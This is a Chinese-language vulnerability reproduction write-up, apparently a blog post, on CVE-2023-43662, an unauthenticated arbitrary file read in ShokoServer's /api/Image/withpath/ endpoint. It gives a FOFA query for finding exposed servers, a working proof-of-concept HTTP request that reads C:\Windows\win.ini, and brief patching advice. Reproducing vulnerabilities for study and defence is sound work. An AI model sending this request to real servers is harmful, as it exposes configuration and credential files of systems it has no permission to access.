ShokoServer /api/Image/withpath/ 任意文件读取漏洞复现(CVE-2023-43662)

0x01 产品简介

ShokoServer是一款高性能、可扩展的服务器软件,专为满足现代数据管理和处理需求而设计。它采用先进的架构和算法,提供稳定、可靠的数据存储、查询和分析服务,适用于各种规模和类型的应用场景。

0x02 漏洞概述

ShokoServer /api/Image/withpath/接口处存在任意文件读取漏洞,未经身份验证得攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 影响范围

version <= 4.2.2

0x04 复现环境

FOFA:title="Shoko WEB UI"

0x05 漏洞复现

PoC

复制代码
GET /api/Image/withpath/C:\Windows\win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
kura_tsuki6 分钟前
[Linux入门] Linux 远程访问及控制全解析:从入门到实战
linux·服务器·安全
Hello.Reader3 小时前
Elasticsearch安全审计日志设置与最佳实践
安全·elasticsearch·jenkins
Lyndon11074 小时前
K8S 九 安全认证 TLS
安全·容器·kubernetes
hqxstudying8 小时前
Java异常处理
java·开发语言·安全·异常
终焉暴龙王16 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川17 小时前
Apache文件解析漏洞
web安全·apache
qq_430908571 天前
网络安全-机遇与挑战
安全
希望奇迹很安静1 天前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南1 天前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
安 当 加 密1 天前
守护汽车“空中升级“:基于HSM/KMS的安全OTA固件签名与验证方案
安全·汽车